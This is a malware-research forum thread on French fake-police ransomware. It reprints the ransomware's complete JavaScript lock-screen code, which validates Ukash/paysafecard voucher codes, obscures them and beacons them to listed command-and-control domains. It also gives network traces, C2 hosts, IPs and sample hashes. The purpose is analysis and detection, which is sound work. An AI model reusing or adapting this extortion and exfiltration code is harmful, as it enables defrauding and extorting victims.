French Ransom (Trojan:Win32/Ransom.FL)


Re: Trojan Ransom / FakePoliceAlert

Postby Xylitol » Sun Dec 11, 2011 9:14 pm

2 French versions in attach

27/43 >> 62.8%
http://www.virustotal.com/file-scan/rep ... 1323484597

6/43 >> 14.0%
http://www.virustotal.com/file-scan/rep ... 1323613279



/*
* Global variables
 */
var debug = false;
var debug_ec = false;

// Developer switches that shipped with the lock screen: 'debug' selects the test
// gate list below and shows an alert, 'debug_ec' turns on the console.log tracing
// used throughout. Either one forces the hidden userid field 'v3' to "1", which
// set_userid() accepts as a valid id (it only rejects "0").
if (debug || debug_ec)
{
    alert("DEBUG! DEBUG! DEBUG!");
    document.getElementById("v3").value = "1";
}

// Demanded amount in EUR (interpolated into MSG_LOW_TOTAL, enforced in send_vouchers()).
var penalty_amount = 200;
// Campaign tag sent as the 'botnet' query parameter of every gate request.
var g_botnet = "fr1";
// Filled in by set_os_version() and set_userid() on the first scheduler ticks.
var g_os_version = "Unknown";
var g_userid = "0";

// Replies the gates are expected to return to a ping and to a data upload.
var RESPONSE_PONG = "Pong!";
var RESPONSE_OK = "OK";
// Victim-facing messages (French): "voucher code incorrect", "voucher sent, wait
// about 24h" and "total below <penalty_amount> €".
var MSG_WRONG_VOUCHERS = "Voucher code incorrecte.";
var MSG_VOUCHERS_SENT = "Voucher a été envoyé. Attends pour environ 24h.";
var MSG_LOW_TOTAL = "Total des moins de "+penalty_amount+" €";

// Command-and-control gate list (implicit global, no 'var'). select_gate() walks it
// round-robin, moving to the next entry whenever the current gate fails to answer.
// The lck-test*.net hosts are the author's test harness; the three live domains
// are the ones seen in the network traces later in this thread.
if (debug)
{
    g_gates = [
        "http://lck-test.net/gate.php",
        "http://lck-test4.net/gate.php", // not exists
        "http://lck-test1.net/gate.php",
        "http://lck-test2.net/gate.php",
        "http://lck-test3.net/gate.php"
        ]
}
else
{
    g_gates = [
      "http://bundespol.com/gate.php",
        "http://yycqparxvohd.com/gate.php",
        "http://wzuoqliyknpz.com/gate.php"
        ]
}

// Number of voucher rows currently in the penalty form (row ids run 0..positions_count-1).
var positions_count = 1;

// Shared state machine driven by monitor() once per second.
var g_state = new Object();
g_state.geo_location_lock = false;       // ip2location lookup in flight
g_state.geo_location_set = false;        // lookup succeeded; stop retrying
g_state.report_lock = false;             // data upload in flight
g_state.report = "";                     // encoded voucher report awaiting upload
g_state.report_sent = true;              // starts true: nothing to send until send_vouchers() queues a report
g_state.gate_selector_lock = false;      // ping in flight
g_state.gate_selector_gate_works = true; // last ping/upload on the current gate succeeded
g_state.gate_selector_calls_count = 999999; // ticks since the last ping; starts above the 3600 threshold so the first eligible tick pings at once
g_state.gate_selector_gate_index = 0;    // index into g_gates
g_state.os_version_set = false;
g_state.userid_set = false;

// Alphabets for base64_encode() (implicit globals). The standard one encodes the
// 'os' beacon parameter; the rotated one (digits first) obscures the voucher
// report. Decoding either is a plain alphabet remap back to standard base64.
g_base64_std_key = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
g_base64_priv_key = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/=";

function print_g_state()
{
    // Developer dump of the g_state tracker; emits nothing unless debug_ec is set.
    if (!debug_ec) return;

    var flag = function(value) { return value ? "true" : "false"; };
    var rows = [
        ["dump of g_state:"],
        ["\tg_state.geo_location_lock: %s", flag(g_state.geo_location_lock)],
        ["\tg_state.geo_location_set: %s", flag(g_state.geo_location_set)],
        ["\tg_state.report_lock: %s", flag(g_state.report_lock)],
        ["\tg_state.report: %s", g_state.report],
        ["\tg_state.report_sent: %s", flag(g_state.report_sent)],
        ["\tg_state.gate_selector_lock: %s", flag(g_state.gate_selector_lock)],
        ["\tg_state.gate_selector_gate_works: %s", flag(g_state.gate_selector_gate_works)],
        ["\tg_state.gate_selector_calls_count: %d", g_state.gate_selector_calls_count],
        ["\tg_state.gate_selector_gate_index: %d (%s)", g_state.gate_selector_gate_index, g_gates[g_state.gate_selector_gate_index]],
        ["==================================================================================================="]
    ];

    for (var n = 0; n < rows.length; n++)
    {
        console.log.apply(console, rows[n]);
    }
}

function base64_encode(input, key)
{
    var output = "";
    var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
    var i = 0;

    while (i < input.length)
    {
        chr1 = input.charCodeAt(i++);
        chr2 = input.charCodeAt(i++);
        chr3 = input.charCodeAt(i++);

        enc1 = chr1 >> 2;
        enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
        enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
        enc4 = chr3 & 63;

        if (isNaN(chr2))
        {
            enc3 = enc4 = 64;
        }
        else if (isNaN(chr3))
        {
            enc4 = 64;
        }

        output = output +
            key.charAt(enc1) + key.charAt(enc2) +
            key.charAt(enc3) + key.charAt(enc4);
    }

    return output;
}

/*
 * tab switcher for the multi-tab window
 */
function switch_tab(content_tab_id, content_id)
{
    // Close both tab headers and hide both panes, then open/show the requested pair.
    var tabIds = ['vouchers_info_tab', 'penalty_form_tab'];
    var paneIds = ['vouchers_info', 'penalty_form'];
    var n;

    for (n = 0; n < tabIds.length; n++)
    {
        document.getElementById(tabIds[n]).className = 'close';
    }
    document.getElementById(content_tab_id).className = 'open';

    for (n = 0; n < paneIds.length; n++)
    {
        document.getElementById(paneIds[n]).style.display = 'none';
    }
    document.getElementById(content_id).style.display = 'block';
}


/*
* Text input filter
*/

(function()
{
    // Defer init() until the document has loaded: W3C listener when available,
    // otherwise the IE attachEvent fallback. Nothing is registered on engines with neither.
    var hasW3C = !!window.addEventListener;
    if (hasW3C)
    {
        window.addEventListener("load", init, false);
    }
    else if (window.attachEvent)
    {
        window.attachEvent("onload", init);
    }
})();

function register_handler(id)
{
    // Attach filter() as the keypress handler of one input element. 'id' is the
    // element itself (despite the name). Uses the W3C API when present, otherwise
    // the legacy onkeypress property.
    var el = id;
    if (!el.addEventListener)
    {
        el.onkeypress = filter;
        return;
    }
    el.addEventListener("keypress", filter, false);
}

// Find all <input> tags for which an event handler has to be registered
function init()
{
    // Wire the keypress filter onto every text input that carries an 'allowed'
    // attribute (the attribute value is the character whitelist filter() reads).
    var inputs = document.getElementsByTagName("input");
    var count = inputs.length;

    for (var n = 0; n < count; n++)
    {
        var field = inputs[n];
        var isText = field.type == "text";
        if (isText && field.getAttribute("allowed"))
        {
            register_handler(field);
        }
    }
}

// This is the 'keypress' event handler that performs the input filtering.
function filter(event)
{
    // Keypress filter for inputs carrying an 'allowed' attribute: a listed
    // character is accepted and the field gets its 'successclass'; anything else
    // gets 'errorclass' and the keystroke is cancelled. 'this' is the input element.
    var evt = event || window.event;
    var code = evt.charCode || evt.keyCode;

    // Pass through everything that is not a printable character: function keys
    // (charCode 0 on Firefox), Ctrl/Alt chords and control codes below 32.
    if (evt.charCode == 0 || evt.ctrlKey || evt.altKey || code < 32) return true;

    var whitelist = this.getAttribute("allowed");
    var errClass = this.getAttribute("errorclass");
    var okClass = this.getAttribute("successclass");

    var ch = String.fromCharCode(code);
    var accepted = whitelist.indexOf(ch) != -1;
    this.className = accepted ? okClass : errClass;
    if (accepted) return true;

    if (evt.preventDefault) evt.preventDefault();
    // Kept as in the original: returnValue is only cleared when it is already truthy.
    if (evt.returnValue) evt.returnValue = false;
    return false;
}

/*
* End of text input filter
 */



/*
* penalty form support code
 */
function get_position_number_html(position_number)
{
    // Row label: the 0-based position rendered as a 1-based number string.
    var oneBased = Number(position_number) + 1;
    return String(oneBased);
}

function get_voucher_code_html(position_number)
{
    // Markup for the voucher-code input of one row: digits only (filter()), at most 19 characters.
    var attrs = [
        "id='voucher_code" + position_number + "'",
        "type='text'",
        "size='25'",
        "maxlength='19'",
        "allowed='0123456789'",
        "errorclass='errborder'",
        "successclass='goodborder'",
        "class='goodborder'"
    ];
    return "<input " + attrs.join(" ") + ">";
}

function get_voucher_value_html(position_number)
{
    // Markup for the voucher-amount input of one row (max 3 digits, recomputes the total on keyup).
    var attrs = [
        "id='voucher_value" + position_number + "'",
        "type='text'",
        "size='14'",
        "maxlength='3'",
        "value='0'",
        "allowed='0123456789'",
        "errorclass='errborder'",
        "successclass='goodborder'",
        "class='goodborder'",
        "onkeyup='refresh_total()'"
    ];
    return "<input " + attrs.join(" ") + ">";
}

function get_img_minus_html(position_number)
{
    // Remove-row icon; the first row (position 0) cannot be removed and gets no icon.
    if (position_number <= 0)
    {
        return "";
    }
    return "<img src='minus.png' alt='' onclick='delete_voucher_position(" + position_number + ")'>";
}

function add_voucher_position()
{
    // Append one voucher row (number, code field, value field, remove icon) to the
    // 'penalty' table and wire the keypress filter onto the two new text inputs.
    // Row ids are contiguous, so the new row takes the current positions_count.
    var row_index = positions_count++;
    var builders = [get_position_number_html, get_voucher_code_html, get_voucher_value_html, get_img_minus_html];

    var row = document.all.penalty.insertRow(row_index + 1);
    for (var col = 0; col < builders.length; col++)
    {
        row.insertCell(col).innerHTML = builders[col](row_index);
    }

    register_handler(document.getElementById("voucher_code" + row_index));
    register_handler(document.getElementById("voucher_value" + row_index));
}

function delete_voucher_position(position_number)
{
    // Remove voucher row 'position_number' from the 'penalty' table. Instead of
    // deleting a single row it snapshots every other row's code/value, wipes all
    // rows, rebuilds positions_count-1 fresh rows (keeping ids 0..n-1 contiguous),
    // restores the saved values, re-attaches the keypress filter and recomputes the total.
    var i, j;
    var vouchers = new Array();
    var values = new Array();
    var total_amount;

    // Snapshot the surviving rows, compacting their indexes with j.
    for(i = 0, j = 0; i < positions_count; i++)
    {
        if (i != position_number)
        {
            vouchers[j] = document.getElementById("voucher_code"+i).value;
            values[j] = document.getElementById("voucher_value"+i).value;
            j++;
        }
    }

    // Rows are always deleted at index 1, so index 0 is presumably a header row — confirm against the HTML.
    for(i = 0; i < positions_count; i++)
    {
        document.all.penalty.deleteRow(1);
    }
   
    positions_count--;

    // Rebuild renumbered rows with the same cell builders add_voucher_position() uses.
    for(i = 0; i < positions_count; i++)
    {
        var newrow = document.all.penalty.insertRow(i + 1);
        var newcell = newrow.insertCell(0);
        newcell.innerHTML = get_position_number_html(i);
        newcell = newrow.insertCell(1);
        newcell.innerHTML = get_voucher_code_html(i);
        newcell = newrow.insertCell(2);
        newcell.innerHTML = get_voucher_value_html(i);
        newcell = newrow.insertCell(3);
        newcell.innerHTML = get_img_minus_html(i);
    }

    // Restore the saved inputs and register the filter on the freshly created elements.
    for(i = 0; i < positions_count; i++)
    {
        document.getElementById("voucher_code"+i).value = vouchers[i];
        document.getElementById("voucher_value"+i).value = values[i];
        register_handler(document.getElementById("voucher_code"+i));
        register_handler(document.getElementById("voucher_value"+i));
    }

    // Same sum as refresh_total(), computed from the snapshot (no do_pay handling here).
    total_amount = 0;
    for(i = 0; i < positions_count; i++)
    {
        total_amount += values[i] * 1;
    }
    document.getElementById("total_amount").innerHTML = total_amount;

    return;
}

function refresh_total()
{
    // Sum every voucher_value field into #total_amount and return the sum.
    // The pay button is unconditionally enabled here; the original carried a
    // commented-out minimum-amount gate, and that check now lives in send_vouchers().
    var sum = 0;
    var row = 0;

    while (row < positions_count)
    {
        sum += document.getElementById("voucher_value" + row).value * 1;
        row++;
    }
    document.getElementById("total_amount").innerHTML = sum;

    document.getElementById("do_pay").disabled = '';

    return sum;
}

/*
* End of penalty form support code
 */


/*
* Geoip code
 */
function http_new_request()
{
    // Return a transport object: the native XMLHttpRequest when defined, otherwise
    // the first MSXML ProgID that instantiates. Yields undefined when nothing works.
    if (typeof XMLHttpRequest != "undefined")
    {
        return new XMLHttpRequest();
    }
    if (!window.ActiveXObject)
    {
        return undefined;
    }

    var progids = ["MSXML2.XMLHttp.5.0", "MSXML2.XMLHttp.4.0", "MSXML2.XMLHttp.3.0", "MSXML2.XMLHttp", "Microsoft.XMLHttp"];
    for (var n = 0; n < progids.length; n++)
    {
        try
        {
            return new ActiveXObject(progids[n]);
        }
        catch (err) {}
    }
}

function http_get(target, callback, options)
{
    // Asynchronous GET of 'target'. An HTTP 200 passes responseText to 'callback';
    // any other final status goes to options.errorHandler when set, else callback(null).
    // options.timeout (ms) arms a timer that aborts the request and calls
    // options.timeoutHandler(target). Callers in this file use it for both the
    // geo lookup and the gate beacons.
    var request = http_new_request();
    var timer;

    if (options.timeout)
    {
        timer = setTimeout(
            function()
            {
                request.abort();
                if (options.timeoutHandler)
                    options.timeoutHandler(target);
            },
            options.timeout
            )
    }

    // NOTE: 'request' is undefined when no transport exists; this assignment then throws unguarded.
    request.onreadystatechange = function()
    {
        if (request.readyState == 4)
        {
            if (timer) clearTimeout(timer);
            if (request.status == 200)
            {
                callback(request.responseText);
            }
            else
            {
                // NOTE(review): after abort() some engines still reach readyState 4 with a
                // non-200 status, so callback(null) may run after timeoutHandler — confirm per browser.
                if (options.errorHandler) options.errorHandler(request.status, request.statusText);
                else callback(null);
            }
        }
    }

    try
    {
        request.open("GET", target, true);
        request.send(null);
    }

    // open/send failures are swallowed: neither callback nor errorHandler fires, and
    // only the timeout timer (if armed above) ever reports back to the caller.
    catch (e) {
    }
}

function set_geo_location()
{
    // Populate the lock screen's "your IP / city / ISP" fields by scraping the public
    // tools.ip2location.com lookup page (a third-party service, not attacker
    // infrastructure). Guarded by geo_location_lock while a request is in flight and
    // by geo_location_set once it succeeded; since monitor() calls this every second,
    // a failed or unparsable response is retried on the next tick.
    var options = new Object();

    function cb_set_geo_location(response_text)
    {
        try
        {
            if (response_text == null)
            {
                // Non-200 reply (http_get passes null when no errorHandler is set).
                g_state.geo_location_set = false;
            }
            else
            {
                // Scrape "<label> ... <b>value</b>" fragments out of the HTML. A missing
                // match makes .match() return null and [2] throw; that lands in the empty
                // catch below, leaving geo_location_set false so the lookup is retried.
                var re = /Your IP Address(.*?)<b>(.*?)<\/b>/i;
                var s_ip = response_text.match(re)[2].toString();
                re = /ISP:(.*?)<b>(.*?)<\/b>/i;
                var s_isp = response_text.match(re)[2].toString();
                // Greedy (.*) here, unlike the two patterns above.
                re = /City:(.*?)<b>(.*)<\/b>/i;
                var s_city = response_text.match(re)[2].toString();
                // Hardcoded fallback address shown when the scrape yields an empty string.
                if (s_ip == "")
                {
                    s_ip = "188.28.11.121";
                }
                // Scraped text is written as HTML (innerHTML), unescaped.
                document.getElementById("v_ip").innerHTML = s_ip;
                document.getElementById("v_city").innerHTML = s_city;
                document.getElementById("v_isp").innerHTML = s_isp;
                g_state.geo_location_set = true;
            }
        }

        catch (e) {}

        finally
        {
            g_state.geo_location_lock = false;
        }
    }

    function cb_set_geo_location_timeout(target)
    {
        // 3 s without an answer: release the lock so the next tick retries.
        g_state.geo_location_set = false;
        g_state.geo_location_lock = false;
    }

    if (!g_state.geo_location_set && !g_state.geo_location_lock)
    {
        g_state.geo_location_lock = true;
        options.timeout = 3000;
        options.timeoutHandler = cb_set_geo_location_timeout;
        http_get("http://tools.ip2location.com/ib2/", cb_set_geo_location, options);
    }
}

function select_gate()
{
    // Gate keep-alive and failover. Once the userid is known, pings
    //   gate.php?cmd=ping&botnet=<g_botnet>&userid=<g_userid>&os=<base64(g_os_version)>
    // and expects RESPONSE_PONG. A ping goes out when the current gate is marked
    // broken (the index then advances round-robin through g_gates) or when the tick
    // counter passes 3600 (~1 h at monitor()'s 1 s period); the counter starts at
    // 999999 so the first eligible tick pings immediately. The traces in this thread
    // show os=V2luZG93cyBYUA==, which is "Windows XP" in the standard alphabet.
    var options = new Object();
   
    function cb_select_gate(response_text)
    {
        // Only the exact string "Pong!" counts as alive; any other body (or null on
        // a non-200 status) marks the gate broken so the next tick rotates.
        if (response_text == RESPONSE_PONG)
        {
            g_state.gate_selector_gate_works = true;
            g_state.gate_selector_calls_count = 0;
            if (debug_ec) console.log("Pinging gate %s was successfully.", g_gates[g_state.gate_selector_gate_index]);
        }
        else
        {
            g_state.gate_selector_gate_works = false;
            if (debug_ec) console.log("Pinging gate %s was failed.", g_gates[g_state.gate_selector_gate_index]);
        }
        g_state.gate_selector_lock = false;
    }

    function cb_select_gate_timeout(target)
    {
        // 5 s without an answer has the same effect as a bad reply.
        g_state.gate_selector_gate_works = false;
        g_state.gate_selector_lock = false;
        // Debug-only message; the %s has no matching argument in the original.
        if (debug_ec) console.log("Pinging gate %s was timeout.");
    }

    if (!g_state.gate_selector_lock && g_state.userid_set)
    {
        // The counter only advances while the gate is believed alive ('||' short-circuits).
        if (!g_state.gate_selector_gate_works || g_state.gate_selector_calls_count++ > 3600) // every one hour
        {
            g_state.gate_selector_lock = true;
            if (debug_ec) console.log("Pinging gate %s...", g_gates[g_state.gate_selector_gate_index]);

            // Failover: move to the next gate in the list before pinging.
            if (!g_state.gate_selector_gate_works)
            {
                g_state.gate_selector_gate_index = (g_state.gate_selector_gate_index + 1) % g_gates.length;
            }

            options.timeout = 5000;
            options.timeoutHandler = cb_select_gate_timeout;
            var os_version = base64_encode(g_os_version, g_base64_std_key);
            http_get(g_gates[g_state.gate_selector_gate_index]+"?cmd=ping&botnet="+g_botnet+"&userid="+g_userid+"&os="+os_version, cb_select_gate, options);
        }
    }
}

function send_report()
{
    // Upload of the victim-entered voucher data. When a report is queued
    // (report_sent == false) and the current gate is believed alive, sends
    //   gate.php?cmd=data&botnet=<g_botnet>&userid=<g_userid>&report=<g_state.report>
    // where g_state.report was already base64-encoded with the private alphabet by
    // send_vouchers() (see the cmd=data request in the traces of this thread).
    // The report is appended to the query string without URL-encoding even though
    // the alphabet contains '+', '/' and '='.
    var options = new Object();
   
    function cb_send_report(response_text)
    {
        // Anything but the exact string "OK" marks the gate broken (select_gate()
        // then rotates) and re-queues the report for the next attempt.
        if (response_text != RESPONSE_OK)
        {
            g_state.gate_selector_gate_works = false;
            g_state.report_sent = false;
            if (debug_ec) console.log("Sending report '%s' on gate %s was failed.", g_state.report, g_gates[g_state.gate_selector_gate_index]);
        }
        else
        {
            if (debug_ec) console.log("Sending report '%s' on gate %s was successfully.", g_state.report, g_gates[g_state.gate_selector_gate_index]);
        }
        g_state.report_lock = false;
    }

    function cb_send_report_timeout(target)
    {
        // Timeout marks the gate broken but, unlike a bad reply, leaves report_sent
        // at true, so a timed-out report is not retried.
        g_state.gate_selector_gate_works = false;
        g_state.report_lock = false;
        if (debug_ec) console.log("Sending report '%s' on gate %s was timeout.", g_state.report, g_gates[g_state.gate_selector_gate_index]);
    }

    if (!g_state.report_lock && !g_state.report_sent && g_state.gate_selector_gate_works)
    {
        g_state.report_lock = true;
        if (debug_ec) console.log("Sending report '%s' on gate %s...", g_state.report, g_gates[g_state.gate_selector_gate_index]);
        // set 'report_sent = true' here to prevent overwriting this flag in
        // moment between changing report value and calling cb_send_report()
        g_state.report_sent = true;
        options.timeout = 5000;
        options.timeoutHandler = cb_send_report_timeout;
        http_get(g_gates[g_state.gate_selector_gate_index]+"?cmd=data&botnet="+g_botnet+"&userid="+g_userid+"&report="+g_state.report, cb_send_report, options);
    }
}

function set_os_version()
{
    // Derive a friendly Windows name from navigator.userAgent (first matching token
    // in table order wins, "" when none matches), publish it to #v_os and to
    // g_os_version, which select_gate() base64-encodes into the 'os' beacon
    // parameter. Runs once; later ticks return early.
    if (g_state.os_version_set) return;

    var table = [
        ["Windows 95",     "Windows 95"],
        ["Windows NT 4",   "Windows NT 4.0"],
        ["Windows 98",     "Windows 98"],
        ["Win 9x 4.9",     "Windows ME"],
        ["Windows NT 5.0", "Windows 2000"],
        ["Windows NT 5.1", "Windows XP"],
        ["Windows NT 6.1", "Windows Seven"],
        ["Windows NT 5.2", "Windows 2003"],
        ["Windows NT 6.0", "Windows Vista"]
    ];
    var ua = navigator.userAgent;
    var label = "";

    for (var n = 0; n < table.length; n++)
    {
        if (ua.indexOf(table[n][0]) > -1)
        {
            label = table[n][1];
            break;
        }
    }

    g_os_version = label;
    document.getElementById("v_os").innerHTML = label;
    g_state.os_version_set = true;
    if (debug_ec) console.log("OS version set successfully.");
}

function set_userid()
{
    // Read the victim id from the hidden 'v3' field into g_userid. Any value other
    // than "0" is accepted and stops further reads; "0" is re-read on every tick.
    if (g_state.userid_set) return;

    var value = document.getElementById("v3").value;
    g_userid = value;
    if (value == "0") return;

    g_state.userid_set = true;
    if (debug_ec) console.log("Userid set successfully.");
}

function monitor()
{
    // One tick of the 1 s scheduler installed by window.onload: refresh the form
    // total, then run the collector and beacon steps in order. The later steps each
    // guard on their g_state flags/locks, so most ticks only the total is recomputed.
    var steps = [refresh_total, set_geo_location, set_os_version, set_userid, select_gate, send_report];
    for (var n = 0; n < steps.length; n++)
    {
        steps[n]();
    }
}

window.onload = function start_monitoring()
{
    // Start the 1-second tick that drives monitor() for the lifetime of the page.
    // (The earlier addEventListener("load", init) registration is unaffected by this assignment.)
    window.setInterval(monitor, 1000);
};

function are_vouchers_valid()
{
    // Validate every voucher_code field: 19 digits must start with "633718", 16
    // digits must start with "0" (consistent with the Ukash and paysafecard
    // voucher formats — not stated on the page, verify), anything else fails.
    // Each field is repainted with its successclass/errorclass; returns false
    // if any row failed.
    var all_ok = true;
    // Kept as in the original: 'accepted' is NOT reset per row, so once one code
    // fails every later row is painted as an error as well.
    var accepted = true;

    for (var row = 0; row < positions_count; row++)
    {
        var field = document.getElementById("voucher_code" + row);
        var code = field.value;
        var head;

        switch (code.length)
        {
            case 19:
                head = code.substr(0, 6);
                if (head != "633718") accepted = false;
                break;
            case 16:
                head = code.substr(0, 1);
                if (head != "0") accepted = false;
                break;
            default:
                accepted = false;
        }

        if (!accepted)
        {
            field.className = field.getAttribute("errorclass");
            all_ok = false;
            continue;
        }
        field.className = field.getAttribute("successclass");
    }

    return all_ok;
}

function send_vouchers()
{
    // Handler for the pay button: validate the voucher codes, check the total
    // against penalty_amount, then pack every row as "<code>-<value>" joined by
    // "x", encode that with the private alphabet and queue it in g_state.report;
    // send_report() ships it as the 'report' parameter on the next scheduler tick.
    // The "voucher sent, wait about 24h" message is shown whether or not anything
    // was queued.
    var report = "";

    if (!are_vouchers_valid())
    {
        alert(MSG_WRONG_VOUCHERS);
        return;
    }

    // Minimum-amount check (refresh_total() itself no longer gates the button).
    var total = refresh_total();
    if (total < penalty_amount)
    {
        alert(MSG_LOW_TOTAL);
        return;
    }

    // Plain-text layout before encoding: code0-value0xcode1-value1x...
    for(var i = 0; i < positions_count; i++)
    {
        var voucher = document.getElementById("voucher_code"+i).value;
        var value = document.getElementById("voucher_value"+i).value;
        report += report.length ? "x" : "";
        report += voucher + "-" + value;
    }

    // A report of 16 characters or fewer is dropped silently (after validation a
    // single row already exceeds this). A changed report is queued once; an
    // identical resubmission does not re-queue.
    if (report.length > 16)
    {
        report = base64_encode(report, g_base64_priv_key);
        if (g_state.report != report)
        {
            g_state.report = report;
            g_state.report_sent = false;
            if (debug_ec) console.log("Report updated and wait sending.");
        }
    }

    alert(MSG_VOUCHERS_SENT);
    return;
}


Network activity:
http://papicaton.in/check?a=2
http://tools.ip2location.com/ib2/
• dns: 1 ›› ip: 188.247.135.97 - adresse: PAPICATON.IN


Network activity:
http://tools.ip2location.com/ib2/
http://bundespol.com/gate.php?cmd=ping&botnet=fr1&userid=ei14b69hk8j2x4n7&os=V2luZG93cyBYUA==
http://bundespol.com/gate.php?cmd=data&botnet=fr1&userid=ei14b69hk8j2x4n7&report=c34Ncj4Ncj4Ncj4Ncj4NciQOc30=
http://yycqparxvohd.com/gate.php?cmd=ping&botnet=fr1&userid=ei14b69hk8j2x4n7&os=V2luZG93cyBYUA==
http://wzuoqliyknpz.com/gate.php?cmd=ping&botnet=fr1&userid=ei14b69hk8j2x4n7&os=V2luZG93cyBYUA==
--
• dns: 4 ›› ip: 67.226.152.139 - adresse: BUNDESPOL.COM
addr: BUNDESPOL.COM -- ip: 60.19.30.135
addr: BUNDESPOL.COM -- ip: 217.24.246.7
addr: BUNDESPOL.COM -- ip: 58.128.228.1
addr: BUNDESPOL.COM -- ip: 67.226.152.139
• dns: 4 ›› ip: 58.128.228.1 - adresse: WZUOQLIYKNPZ.COM
addr: WZUOQLIYKNPZ.COM -- ip: 60.30.73.102
addr: WZUOQLIYKNPZ.COM -- ip: 60.19.30.135
addr: WZUOQLIYKNPZ.COM -- ip: 67.226.152.139
addr: WZUOQLIYKNPZ.COM -- ip: 58.128.228.1

Data found inside the exe:
einzahlung@mail.com
lck-test.net
lck-test1.net
lck-test2.net
lck-test3.net
lck-test4.net
CNDROAAYGHMF.COM
YYCQPARXVOHD.COM

http://xylibox.blogspot.com/2011/12/fak ... eting.html
I was a little more motivated because it targets my country.

Re: Trojan Winlock / Ransom / ScreenLocker

Postby rkhunter » Tue Dec 27, 2011 6:02 am

Ransom for French users

Original VT (8/ 43, 18.6%)

Unpacked VT (6/ 43, 14.0%)



In attach original and unpacked.

Edit: screens were reuploaded.

French Ransom (Trojan:Win32/Ransom.FL)

Postby rkhunter » Thu Dec 29, 2011 4:44 am

Another French ransom (screens as above).

Orig VT (15/43, 34.9%)

In attach orig and unpacked.

Re: Trojan Winlock / Ransom / ScreenLocker

Postby rkhunter » Thu Jan 05, 2012 1:02 pm

French ransom

Kaspersky: Trojan-Ransom.Win32.Blocker.gpj

As always, under UPX (but strangely, the MS detection is VirTool:Win32/Obfuscator.QG)

7/43 >> 16.3%

Re: Trojan Winlock / Ransom / ScreenLocker

Postby rkhunter » Sat Jan 07, 2012 3:33 pm

French winlock - Trojan:Win32/Ransom.FL.

13/43 >> 30.2%

Replaces explorer.exe in system root and its copy in dllcache.

cndroaayghmf.com GET /de/2/gate.php?cmd=ul&id=pc33redh4v3z6dlt HTTP/1.1
fgppixrcvnfu.com GET /gate.php?cmd=ping&botnet=fr8&userid=pc33redh4v3z6dlt&os=V2luZG93cyBYUA== HTTP/1.1
sxnykimafhbj.com GET /gate.php?cmd=ping&botnet=fr8&userid=pc33redh4v3z6dlt&os=V2luZG93cyBYUA== HTTP/1.1
fgppixrcvnfu.com GET /gate.php?cmd=ping&botnet=fr8&userid=pc33redh4v3z6dlt&os=V2luZG93cyBYUA== HTTP/1.1
sxnykimafhbj.com GET /gate.php?cmd=ping&botnet=fr8&userid=pc33redh4v3z6dlt&os=V2luZG93cyBYUA== HTTP/1.1
fgppixrcvnfu.com GET /gate.php?cmd=ping&botnet=fr8&userid=pc33redh4v3z6dlt&os=V2luZG93cyBYUA== HTTP/1.1
sxnykimafhbj.com GET /gate.php?cmd=ping&botnet=fr8&userid=pc33redh4v3z6dlt&os=V2luZG93cyBYUA== HTTP/1.1
fgppixrcvnfu.com GET /gate.php?cmd=ping&botnet=fr8&userid=pc33redh4v3z6dlt&os=V2luZG93cyBYUA== HTTP/1.1
sxnykimafhbj.com GET /gate.php?cmd=ping&botnet=fr8&userid=pc33redh4v3z6dlt&os=V2luZG93cyBYUA== HTTP/1.1

Re: Trojan Winlock / Ransom / ScreenLocker

Postby rkhunter » Tue Jan 17, 2012 6:18 am

One more French ransom, under UPX

MD5: c19886400c9fc45dbbdd33af8a51ec28

13/43

Replaces explorer.exe and its copy at dllcache.


Requests:
cndroaayghmf.com GET /de/2/gate.php?cmd=ul&id=pc33redh4v3z6dlt
vwbulrzmduks.com GET /gate.php?cmd=ping&botnet=fr8&userid=pc33redh4v3z6dlt&os=V2luZG93cyBYUA
gfnboiygpdti.com GET /gate.php?cmd=ping&botnet=fr8&userid=pc33redh4v3z6dlt&os=V2luZG93cyBYUA


Unpacked (McAfee says this is a PWS)
9/43

In archive original and unpacked.

Re: Trojan Winlock / Ransom / ScreenLocker

Postby rkhunter » Wed Jan 18, 2012 9:35 am

One more French ransom

MD5: fbdd18a3db17490acfd03416315fb18b

10/43

It seems Microsoft has a problem with this packer, because this is not the first time it can't bypass it - VirTool:Win32/Obfuscator.QG

Re: Trojan Winlock / Ransom / ScreenLocker

Postby EP_X0FF » Wed Jan 18, 2012 11:31 am

rkhunter wrote:It seems Microsoft has a problem with this packer, because this is not the first time it can't bypass it - VirTool:Win32/Obfuscator.QG


Not really a lack of anything. The closest equivalent to VirTool:Win32/Obfuscator in Dr.Web's bases, for example, is probably Trojan.Packed. Such obfuscation techniques are used on various kinds of malware; files with such obfuscation may have virtually any purpose. By default they are simply moved to quarantine.

Re: Trojan Winlock / Ransom / ScreenLocker

Postby rkhunter » Wed Jan 18, 2012 11:40 am

EP_X0FF wrote:
rkhunter wrote:It seems Microsoft has a problem with this packer, because this is not the first time it can't bypass it - VirTool:Win32/Obfuscator.QG


Not really a lack of anything. The closest equivalent to VirTool:Win32/Obfuscator in Dr.Web's bases, for example, is probably Trojan.Packed. Such obfuscation techniques are used on various kinds of malware; files with such obfuscation may have virtually any purpose. By default they are simply moved to quarantine.

Yes, you're right. But I don't see many such verdicts; I think this "problem" will be solved by MS. It seems to be upx->obfuscation->upx. Probably this packing method is used by BH.

Re: Trojan Winlock / Ransom / ScreenLocker

Postby rkhunter » Thu Jan 19, 2012 11:08 am

French

MD5: b283d86c4f97b526c0ecd8ebffae5444
9/43
